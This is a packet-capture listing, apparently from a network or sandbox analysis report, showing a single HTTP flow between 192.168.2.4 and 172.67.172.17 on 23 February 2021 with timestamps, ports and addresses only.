Feb 23, 2021 15:31:26.033835888 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.033859968 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.033876896 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.033883095 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.033885956 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.033906937 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.033942938 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.033945084 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.034692049 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.034722090 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.034742117 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.034761906 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.034782887 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.034804106 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.034830093 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.034836054 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.034842968 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.034852982 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.034902096 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.035547972 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.035569906 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.035586119 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.035604000 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.035619020 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.035634995 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.035650969 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.035670996 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.035691023 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.035705090 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.036377907 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.036398888 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.036415100 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.036432028 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.036448956 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.036465883 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.036483049 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.036484957 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.036490917 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.036503077 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.036518097 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.036544085 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.036549091 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.037328005 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.037350893 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.037369013 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.037404060 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.037425041 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.037431002 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.037437916 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.037441969 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.037461996 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.037466049 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.037480116 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.037497997 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.037550926 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.037556887 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.038269043 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.038292885 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.038311958 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.038328886 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.038346052 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.038363934 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.038379908 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.038392067 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.038400888 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.039974928 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.041614056 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.194781065 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.247600079 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.316340923 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.316375971 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.316397905 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.316411018 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.316422939 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.316436052 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.316452980 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.316472054 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.316490889 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.316510916 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.316534996 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.316560030 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.316586971 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.316610098 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.316629887 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.316649914 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.316669941 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.316693068 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.316715002 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.316735983 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.316760063 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.316783905 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.316807032 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.316813946 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.316828012 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.316834927 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.316838980 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.316842079 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.316844940 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.316847086 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.316848040 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.316850901 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.316864967 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.316874027 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.317493916 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.317528009 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.317552090 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.317574978 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.317591906 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.317610979 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.317611933 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.317620993 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.317631006 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.317650080 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.317671061 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.317686081 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.317694902 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.317698956 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.318044901 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.318068027 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.318147898 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.318151951 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.318157911 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.318192959 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.318216085 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.318238974 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.318259001 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.318280935 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.318283081 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.318284988 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.318303108 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.318322897 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.318340063 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.318357944 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.318361998 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.318366051 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.318377972 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.318394899 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.318413973 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.318434000 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.318439960 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.318445921 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.318454027 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.318499088 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.319102049 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.319139957 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.319160938 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.319181919 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.319205046 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.319231033 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.319253922 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.319272041 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.319277048 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.319282055 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.319303036 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.319324970 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.319343090 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.319345951 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.319349051 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.319367886 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.319384098 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.319396973 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.319413900 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.319468021 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.319473028 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.320056915 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.320086956 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.320110083 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.320130110 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.320152044 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.320178986 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.320182085 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.320204020 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.320223093 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.320245028 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.320264101 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.320266008 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.320270061 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.320286036 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.320306063 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.320324898 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.320346117 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.320365906 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.320367098 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.320369959 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.320574045 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.320966959 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.320993900 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.321017981 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.321039915 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.321062088 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.321077108 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.321084023 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.321088076 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.321101904 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.321119070 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.321141005 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.321166039 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.321180105 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.321183920 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.321186066 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.321208954 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.321232080 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.321234941 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.321237087 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.321260929 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.321283102 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.321341991 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.321346998 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.321923971 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.321955919 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.321980000 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.322001934 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.322022915 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.322042942 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.322061062 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.322076082 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.322097063 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.322118044 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.322138071 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.322154999 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.322173119 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.322195053 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.322201967 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.322212934 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.322218895 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.322336912 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.322765112 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.322787046 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.322828054 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.322844028 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.322871923 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.322890997 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.322904110 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.322922945 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.322940111 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.322956085 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.322971106 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.322987080 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.323000908 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.323003054 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.323009968 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.323019028 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.323038101 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.323137999 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.323684931 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.323707104 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.323726892 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.323853016 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.323884964 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.323903084 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.323903084 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.323915958 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.323925972 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.323945045 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.323966026 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.323983908 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.324001074 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.324018955 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.324035883 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.324052095 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.324068069 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.324078083 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.324084044 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.324084997 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.324104071 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.324122906 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.324210882 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.324222088 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.324800968 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.324822903 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.324839115 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.324857950 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.324875116 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.324892044 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.324908972 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.324927092 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.324949026 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.324958086 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.324968100 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.324970007 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.324985027 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.325002909 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.325018883 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.325031996 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.325048923 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.325058937 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.325064898 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.325418949 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.325814009 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.325846910 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.325872898 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.325896978 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.325915098 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.325922966 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.325930119 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.325934887 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.325953007 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.325969934 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.325987101 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.325994015 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.325999975 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.326009989 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.326031923 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.326057911 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.326071024 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.326075077 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.326078892 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.326096058 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.326112986 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.326164961 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.326169014 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.326659918 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.326693058 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.326716900 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.326852083 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.369863987 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.369920015 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.369962931 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.370002031 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.370040894 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.370064974 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.370079994 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.370117903 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.370161057 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.370177984 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.370182991 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.370202065 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.370239973 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.370287895 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.370328903 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.370368004 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.370368958 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.370373011 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.370405912 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.370446920 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.370482922 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.370496035 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.370502949 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.370520115 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.370557070 CET	80	49755	172.67.172.17	192.168.2.4
